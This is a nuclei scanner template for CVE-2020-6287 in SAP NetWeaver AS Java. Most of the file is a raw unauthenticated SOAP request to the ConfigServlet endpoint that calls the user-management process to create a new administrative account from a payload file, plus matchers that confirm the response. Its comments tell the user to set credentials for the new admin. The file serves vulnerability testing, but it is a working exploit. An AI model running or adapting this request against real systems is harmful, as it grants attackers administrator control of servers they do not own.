nuclei-templates/cves/CVE-2020-6287.yaml

37 lines
1.3 KiB
YAML

id: CVE-2020-6287
info:
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
author: dwisiswant0
severity: critical
# Affected Versions: 7.30, 7.31, 7.40, 7.50
# p.s:
# > Don't forget to change the default credentials
# > to create new admin in associated file:
# > `payloads/CVE-2020-6287.xml`
# Ref:
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
requests:
- payloads:
data: "payloads/CVE-2020-6287.xml"
raw:
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=UTF-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('data')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "urn:CTCWebServiceSi"
part: body
- type: status
status:
- 200